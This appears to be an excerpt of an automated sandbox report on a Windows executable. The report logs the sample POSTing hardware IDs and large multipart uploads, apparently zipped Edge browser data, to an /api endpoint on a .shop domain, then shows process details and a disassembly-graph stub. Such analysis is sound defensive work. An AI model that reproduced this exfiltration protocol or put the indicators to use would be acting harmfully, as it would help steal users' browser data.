                  Data Ascii: omparatorPKP{.)PKMQEdge/BrowserVersion.txtPK=% WEdge/dp.txtPKA`Edge/Default/HistoryPKd;
                  2024-07-25 20:14:49 UTC  812  IN  HTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=camj4jvmqgrvmjol6ontvctuoc; expires=Mon, 18-Nov-2024 14:01:28 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b6Ag8XSvl9ibeyC1PdZKBIG0QWVyzzXogK8bza%2Fr21AwKZzrDf09mSS6uvfEtcQtTP6c3GA27jM3Ft5UqIXaEGdSvVe21BXWyMpwotvVZjwouWBB5rj9UJ%2FWsr%2B5XjBzoMMN9LLcdsC%2BNrQ%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed1842cf28c5f-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:49 UTC  19  IN  Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                  Data Ascii: eok 8.46.123.33
                  2024-07-25 20:14:49 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID: 4   Source IP: 192.168.2.9   Source Port: 49710   Destination IP: 104.21.48.25   Destination Port: 443   PID: 6236   Process: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  Timestamp  Bytes transferred  Direction  Data
                  2024-07-25 20:14:50 UTC  290  OUT  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 20574
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:50 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:50 UTC5243OUTData Raw: cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: |lQJ$nInVZ+?:us}Q0u?4E([:s~
                  2024-07-25 20:14:51 UTC  828  IN  HTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=nbd7jgt23142ah7va70okoappe; expires=Mon, 18-Nov-2024 14:01:30 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axWG%2FGCRgeAE7y1%2BonvjZHT4Pzhi8bond8v5KpZAqFbwuyZSEhqMOzIG%2F%2BHMc%2BVZvyrn2Nn%2Fyh%2FECTGeEr5xT995zkncE%2BQAI8jtW%2FwB9zUOLBWWcI032nI8zy%2B5MP%2FiAd%2FT73Ag5mWm50M%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed19049d442cf-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:51 UTC  19  IN  Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                  Data Ascii: eok 8.46.123.33
                  2024-07-25 20:14:51 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID: 5   Source IP: 192.168.2.9   Source Port: 49711   Destination IP: 104.21.48.25   Destination Port: 443   PID: 6236   Process: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  Timestamp  Bytes transferred  Direction  Data
                  2024-07-25 20:14:53 UTC  289  OUT  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 1379
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:53 UTC1379OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:54 UTC  810  IN  HTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=eh15d15e4v7u82ge6025napb3t; expires=Mon, 18-Nov-2024 14:01:32 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mTzqF7XD%2BfiQIWfHaJWpxhaUQhhMFciVW2Vi9OFB6ohSEYrd7ajAVI9CShphK2bQuyVK53UZu5Y2rag1NxCWq16jBlxjGrc6yFQue3DTtNXIiGvII%2FwD9VClK6vM1Midw5DV33%2FdieownAo%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed1a21aba17b5-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:54 UTC  19  IN  Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                  Data Ascii: eok 8.46.123.33
                  2024-07-25 20:14:54 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID: 6   Source IP: 192.168.2.9   Source Port: 49712   Destination IP: 104.21.48.25   Destination Port: 443   PID: 6236   Process: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  Timestamp  Bytes transferred  Direction  Data
                  2024-07-25 20:14:55 UTC  291  OUT  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 584281
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 56 95 de f5 ed c0 9b 9b bb da 93 dc 46 10 95 56 b1 9d 5d bf 0b 4c ad 79 fd 6f df d0 aa 16 16 76 08 c0 51 35 00 95 1b 75 b7 82 08 18 2e 20 01 8c f0 ad 88 1e 88 44 d2 be d0 e7 89 24 a6 d2 da b6 83 16 46 42 77 ee 41 c8 71 02 78 56 4d bf 01 5a 4b 37 a7 2e ab 02 4d fb aa 06 82 98 51 92 c8 74 0d 0f 93 0a 61 5e ac e6 44 43 99 7f 94 46 b8 5d 2e ac 40 5e a9 f5 f0 e2 20 51 73 73 c5 5f f3 a9 81 e3 7c 03 ec 86 99 50 eb 86 c7 71 ed c5 d9 58 58 7b d1 2c a7 70 6f c2 db dd 34 f6 f8 94 41 a5 f8 64 b1 f4 8a 2f 33 22 63 b6 ae 37 9e e3 74 97 ab 15 08 06 a1 42 e0 72 6b 43 46 4e 33 ba fd 39 dc c1 3d 7c 10 bc 71 26 d2 67 0d 02 66 7f ea 0e 66 4e d3 09 48 37 e1 bd 5d e9 b2 22 cd 32 74 9e de a6 7a c7 87 47 69 39 09 8c a5 bb d2 3d 50 fb 80 d5 9f 8e 1e ff cb 35 7c 89 44 91 d0 40 c2
                  Data Ascii: VFV]LyovQ5u. D$FBwAqxVMZK7.MQta^DCF].@^ Qss_|PqXX{,po4Ad/3"c7tBrkCFN39=|q&gffNH7]"2tzGi9=P5|D@
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 8d b1 6e 0e 02 61 a5 83 14 43 4c ea 83 0b f1 18 96 40 e7 d3 1f cb b2 09 8f aa f5 ff 00 17 47 fc ad 3a 8b 57 af a3 37 9f 95 10 a1 0d 3c 7b df 47 bb 44 4e fc 80 94 75 50 58 40 d4 da 87 ef 77 0e 07 7e 96 5f f9 1e 40 43 ef eb 2f 55 90 28 dc 8a df 2b 1d 06 df 1b 91 ee 0d b1 cc 0c 9c e4 b5 58 7b 17 64 f6 77 82 68 bd 1f b5 47 fe fc ee 06 f6 68 37 a3 a7 99 a1 e4 36 da 37 c7 e5 b5 b5 cc 28 9b cc 2e 6b de da 14 ae f2 f0 ea 0d 88 bd 52 ec 7d f3 3b 98 eb 4e 0c 1a 51 7c ee 13 ae e3 5e af 35 53 3c 14 c3 c5 9c e5 d8 9f 3c 5d e9 13 b3 bf c6 c2 fb 80 67 47 c4 31 9b 35 43 eb f2 7e fc 94 cc 48 37 66 78 af e4 c3 d9 df cb 2b d7 67 a6 1d 9b 33 ab ab 46 cf 70 9d 65 76 3b 56 08 9f bd 77 a7 93 43 e1 e0 f3 b5 8d d7 77 e3 58 33 63 ce 23 3a 86 d3 80 2e 3a 9a b4 2b f5 eb ac 09 d4 6c
                  Data Ascii: naCL@G:W7<{GDNuPX@w~_@C/U(+X{dwhGh767(.kR};NQ|^5S<<]gG15C~H7fx+g3Fpev;VwCwX3c#:.:+l
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 49 5c f2 99 10 29 bc 60 39 7a 3d 65 67 e9 e9 cb cf 1e 6c d4 cb e7 47 62 1c be 2b 07 d6 08 e2 f5 78 f8 72 8d da cf 11 19 00 74 53 3e 11 18 d2 d8 89 51 4f da a0 95 7b 13 63 3b 6f 7e 49 a0 43 bd ad 23 be 12 8b 08 21 91 3e b7 41 ac e5 6a e6 5e 0c 5e 68 d2 99 4d 6e df 7a 1b 6c b4 e9 2b a5 a4 57 e0 11 5b b3 c6 a8 fc 3a 2e a3 ef ed 5e a5 62 b1 32 7c 32 b8 86 d9 e8 de a4 26 fe 1e 81 25 4a ed 79 76 48 84 0c 70 92 3b a1 b4 e7 2d 9c f8 35 fa 90 d3 9a 10 d5 a1 ad 08 4e 22 11 ad ac 67 1d 75 b6 1e 1c 3d c5 5e 04 09 e3 b8 5f f2 96 41 19 2a fb c9 3d bd 91 07 3f 98 e5 0e 25 3f 25 91 32 b9 80 22 4a e2 09 28 94 14 d1 e0 6b c4 7e 39 ea f1 b1 49 04 b8 22 e1 87 9b f5 70 0a 20 07 5b d8 fd 35 21 24 33 8d 43 4c 09 48 68 ac ee 44 de 65 03 c5 2a e1 ff 71 07 94 1c f2 86 02 39 0e c0
                  Data Ascii: I\)`9z=eglGb+xrtS>QO{c;o~IC#!>Aj^^hMnzl+W[:.^b2|2&%JyvHp;-5N"gu=^_A*=?%?%2"J(k~9I"p [5!$3CLHhDe*q9
                  2024-07-25 20:14:55 UTC15331OUTData Raw: fc e0 7d c2 69 3f b3 81 c3 84 a6 b0 27 00 1b 92 d6 41 77 18 40 0e 13 5d d7 8a 01 26 fd de a0 7f bc 36 2f fc ee 79 95 0f 8b 7a a1 7a e8 84 82 07 b3 7c 47 dc d8 af a3 72 dc aa 85 d8 a0 93 96 e4 6c 25 fd 14 7a b6 cb eb d7 a1 1f 1d 2e 89 07 b1 af 63 56 7a 58 59 66 b3 34 6b 5a 10 7c 3d 1d fe 41 1a bd 4e 85 27 47 de cb 5e a3 a1 36 05 56 cb 5e 13 e5 26 1d 78 51 29 44 a5 37 31 65 41 7e 7a c7 ad e1 06 4e e9 af 82 3b 21 a8 e5 28 79 3c b6 97 97 c3 71 ef de 2f da 9e bc 9d 14 d4 d8 77 f8 8e bc cd 9a 72 ad 94 13 43 10 82 ef 80 4c 0e e3 c5 61 87 e1 df 40 42 a1 49 8a df 20 3c 6f 2e b9 27 7b af 77 27 fb e9 cd 88 87 b4 d7 a5 5f 97 c3 ce c8 94 3a c1 0a 23 48 17 dd f1 90 00 a1 65 5e 10 39 05 ff 54 ca f2 b9 42 b0 10 ac 8c 78 ba f4 7b 13 3d c4 dd d9 de 89 1b 97 c3 54 a6 d7 2d
                  Data Ascii: }i?'Aw@]&6/yzz|Grl%z.cVzXYf4kZ|=AN'G^6V^&xQ)D71eA~zN;!(y<q/wrCLa@BI <o.'{w'_:#He^9TBx{=T-
                  2024-07-25 20:14:55 UTC15331OUTData Raw: d7 4a 63 c9 2c cb e1 65 f3 77 e6 49 68 3c 2a 4c 8b 17 87 4b 52 36 95 ca 08 d7 6b 61 2d 3d f4 65 58 31 60 f5 9f 66 37 02 9a 12 8f ee 10 8e d5 a4 24 c9 33 f1 7c a7 89 89 ad 3e 5b 33 d5 8b 7d bd 45 74 4e 19 6a 6a 8f e0 8b 43 b1 ce e8 48 b5 d9 bc 29 37 d1 62 5f b6 f7 79 a6 e7 0c 0d 80 d9 9b 37 87 d9 0f 3c de cf 39 d8 24 90 44 54 2e aa 4e fe 60 af 17 d3 1f c1 86 08 54 3b cd 34 a5 3a 9d d3 2b 6e b1 21 5f 68 21 20 8c a0 20 81 75 68 b9 af 32 54 ed 97 eb 38 55 0a 93 62 85 fa 3d 7c 92 53 2b 8a 92 fa 45 50 8e 8e d1 64 51 3c 7c 78 10 fb 73 47 26 7f 3c 9e d8 d4 10 ea fe 2d 26 8a 12 ba 98 e1 c5 a2 a5 7c 5c 85 19 d0 ca 42 52 97 51 ee aa 00 94 94 9d 18 ea 28 03 89 12 03 44 17 47 3e f7 17 92 f2 d1 bc da cf 54 f1 67 38 84 fd 16 fa 25 16 7a f7 83 4b 83 f6 e4 85 73 59 41 53
                  Data Ascii: Jc,ewIh<*LKR6ka-=eX1`f7$3|>[3}EtNjjCH)7b_y7<9$DT.N`T;4:+n!_h! uh2T8Ub=|S+EPdQ<|xsG&<-&|\BRQ(DG>Tg8%zKsYAS
                  2024-07-25 20:14:55 UTC15331OUTData Raw: d5 5b c0 f6 a0 55 7b f5 16 e2 d1 6b 9a 69 1c a1 73 6c ea bb 9e 67 94 7c 12 ce 6c 34 53 91 cb 8b b8 5c 1f a3 72 a1 06 45 f1 d9 d5 cc 3d 96 64 6a 1f 16 70 eb 6a 8a 33 df 32 f7 fe ed fc 64 15 84 ea ef 3c 62 d2 14 df e1 3b 7c 42 d7 6d 30 07 6d ff 57 c3 b4 96 12 ad 7c 87 ff fc 04 6e cd 93 ae cd 9b d9 25 a6 32 34 6b d8 77 56 8e ad 66 11 fa 3c f2 89 8b 4d 92 d7 79 0c 29 6c f5 ea ef 97 b1 d0 3c 58 02 6b bd 88 7c 9c a9 7e 86 22 3a ab c3 b4 07 d0 97 c5 d3 2d 30 8d 1a 4a 90 e4 a6 67 ab 0a 2a a8 e0 80 24 ad 8d 4a 90 25 5a e5 e6 3b 02 8a d3 37 0e 7d 3d 09 ce ec b0 fe 4d c0 97 33 2f bb 40 e9 02 cc 1d 7f d4 c1 c8 97 5e a4 89 ed 56 5d c3 b4 7d 06 fd c7 34 35 34 f8 d2 bf 9b 0b 03 53 2d f4 2f 23 4c 7a ca 17 aa 3c 79 69 c4 e8 29 b5 42 09 09 b2 fa d3 58 b1 16 ec 40 50 62 fe
                  Data Ascii: [U{kislg|l4S\rE=djpj32d<b;|Bm0mW|n%24kwVf<My)l<Xk|~":-0Jg*$J%Z;7}=M3/@^V]}454S-/#Lz<yi)BX@Pb
                  2024-07-25 20:14:55 UTC15331OUTData Raw: f7 08 8c e8 6d a3 05 0a 8c 90 9e 5f 28 9a ad 82 84 7c eb a8 a0 10 18 74 c9 b6 e0 a9 18 cd 25 ff e5 1d 50 a0 8c 49 f2 e7 df 04 a0 44 a2 e1 c3 7f ff c9 db 9f 8f ae e4 39 44 41 d8 ae a3 ad ba dc 97 aa 58 41 0c 8c 5b f6 ce 9b aa d0 3c 67 28 df 01 d5 1d 93 1e eb 4c b9 a9 56 5b ee 40 e9 91 4d 42 3c 30 d8 42 ef d7 d7 6c 8c e2 e1 38 98 97 05 e9 a5 a8 8c 73 b8 c6 0c d1 e3 ee 4b 94 0c 43 1c ac 6e 03 20 5a a9 f7 ec 81 ad 1c f7 77 88 24 58 9d c2 f2 dd 31 22 b1 e9 21 70 56 d7 7e d2 41 fe ab db 31 a3 99 a0 a3 4d f8 62 22 ba cf 8a 6e f7 53 c9 33 b3 21 25 2a 50 8c 73 db b1 c0 45 1d d7 ed 10 19 05 19 32 db 2d 29 d6 0b b5 a4 e9 13 e0 a4 d8 fa 4f 93 7f 11 bf d4 90 a7 f3 f0 b0 88 fa 73 6a 4a bb cf e2 dd 4f 88 5f 55 3a be dc e4 51 87 af 40 f1 83 16 a6 e3 72 c2 22 55 db 55 1b
                  Data Ascii: m_(|t%PID9DAXA[<g(LV[@MB<0Bl8sKCn Zw$X1"!pV~A1Mb"nS3!%*PsE2-)OsjJO_U:Q@r"UU
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 08 29 91 3b 6a a4 24 31 19 6b fc d1 1d 9e b0 ca ad 5f 89 c9 84 d7 5d c4 8e e3 af bb c3 e3 e3 4d 93 11 ab 30 70 87 1f 43 49 6b 13 6a 30 89 5b 1f 30 c7 c2 09 71 2c 71 30 ee 72 9d e1 68 fd 5b c9 8f 25 86 0c b8 c7 39 87 84 4a 85 f5 1b 42 c6 88 16 37 74 f3 3c 10 a4 47 c2 4b 23 11 d0 c0 ba f5 0b e5 29 70 4d b8 b7 8b 51 a1 9e 5c cf 6f cf 43 8d fc 1c 9e b8 73 51 9b cc 59 83 f9 bb 46 44 8a 35 1c 28 50 4b cf ec b2 51 51 4e 09 e7 99 10 fa 44 91 00 f6 23 c2 d6 fa b8 1f 1f ee 3a d5 1d 71 4b 4d 1b d0 4f 87 e6 c3 97 30 bf 64 f8 6f 55 e6 4b 45 62 37 6f 77 e5 2f 16 79 d5 6c 1a 4f 81 ee b4 8f df da c1 fc de 14 d8 d6 f7 b4 68 d5 c4 74 5f 13 e7 34 a6 bd 0f 6b 20 c1 69 c1 fa b1 e3 5b 65 24 79 48 de ec aa fb 72 b4 51 c2 a3 b8 9a 81 c5 57 cf aa f7 61 0b bd 94 47 42 36 53 26 e0
                  Data Ascii: );j$1k_]M0pCIkj0[0q,q0rh[%9JB7t<GK#)pMQ\oCsQYFD5(PKQQND#:qKMO0doUKEb7ow/ylOht_4k i[e$yHrQWaGB6S&
                  2024-07-25 20:14:55 UTC15331OUTData Raw: ed 96 fc cf 1e ce d1 b2 a9 52 52 a0 0b c8 f0 63 3e 19 15 bd d3 d1 b3 9d 36 29 c2 30 75 b7 e4 36 62 37 6d a4 4d 93 52 8e 92 5f 93 07 0b 51 30 cd bf a6 bf d9 68 83 94 1a c2 51 69 2e 5f 3d 31 e6 b4 79 10 e2 c5 d9 d4 cd ff 30 91 9a b4 26 8d f2 b9 e9 19 59 e0 44 9d 73 9c 7d 27 f5 b0 c8 9f 95 ce 3c 33 b8 78 e8 f3 e5 b5 13 d7 fb cb 9d 7d a6 e6 0e f4 bc 73 f6 8e 0f d9 e4 68 96 ea 2a ea 35 97 ff 65 da f5 d5 c5 56 4c ee e7 ac a0 3e 4f fc c8 0b 0e eb f7 5c eb d7 ed eb 7c b0 23 38 6d 7a 20 f4 f7 a9 bc b6 be f3 d6 69 b3 03 e1 eb bd b3 33 6e 15 c3 03 c1 a3 a5 b3 69 6e 2d 3e b4 15 eb 16 ab 9d 5d 83 f6 d1 dd 73 bd 5e 95 6d a2 e0 fa 0c 12 54 70 d6 a7 ae cf f4 7c 9a bd b9 e3 29 d5 57 52 63 8a 47 c9 a6 64 22 4e f3 28 27 73 f0 22 99 8c 60 c8 ff eb a2 af 7e e0 0d 01 3c 8c 01
                  Data Ascii: RRc>6)0u6b7mMR_Q0hQi._=1y0&YDs}'<3x}sh*5eVL>O\|#8mz i3nin->]s^mTp|)WRcGd"N('s"`~<
                  2024-07-25 20:14:57 UTC  818  IN  HTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=7df4vh7e12kog90uibea12ajff; expires=Mon, 18-Nov-2024 14:01:35 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUgXspimXoa0T1OV5z2aT3ySGH%2BeQlal%2BueUnjQTalpgLvY7u4LybWI%2BxnpEKM5%2BRGOy3XXXybMDWWnx8cllS1m5BlTZdAeH2F7DbNdmXv28h2%2B2uo1S913mDBveDo1U%2Fhor0UgzhSbS%2F4s%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed1ad89988cb7-EWR
                  alt-svc: h3=":443"; ma=86400



                  Target ID: 0
                  Start time: 16:14:41
                  Start date: 25/07/2024
                  Path: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  Wow64 process (32bit): true
                  Commandline: "C:\Users\user\Desktop\LisectAVT_2403002A_236.exe"
                  Imagebase: 0x3b0000
                  File size: 5'735'941 bytes
                  MD5 hash: 8ECBC517B61CDB069495B3F3E3887A0F
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low
                  Has exited: true


                    Execution Graph

                    Execution Coverage:13.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:15.9%
                    Total number of Nodes:675
                    Total number of Limit Nodes:17

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: E$J%$JQ$[Q$)+$57$=?
                    • API String ID: 292159236-1103543027
                    • Opcode ID: 9b887c1be7cbd7906656fe8b030c69f6047bd493107a8fcca087efcd1c7b91a7
                    • Instruction ID: 163ee22abbe90403263fce0c73cb576aa1d90ac2335996cf55a03ce748e2e86d
                    • Opcode Fuzzy Hash: 9b887c1be7cbd7906656fe8b030c69f6047bd493107a8fcca087efcd1c7b91a7
                    • Instruction Fuzzy Hash: E10263B1110B41CFE335CF25D885B66B7E8FB05304F548A2CE6AB8BAA0DB75B845CB50

                    Control-flow Graph

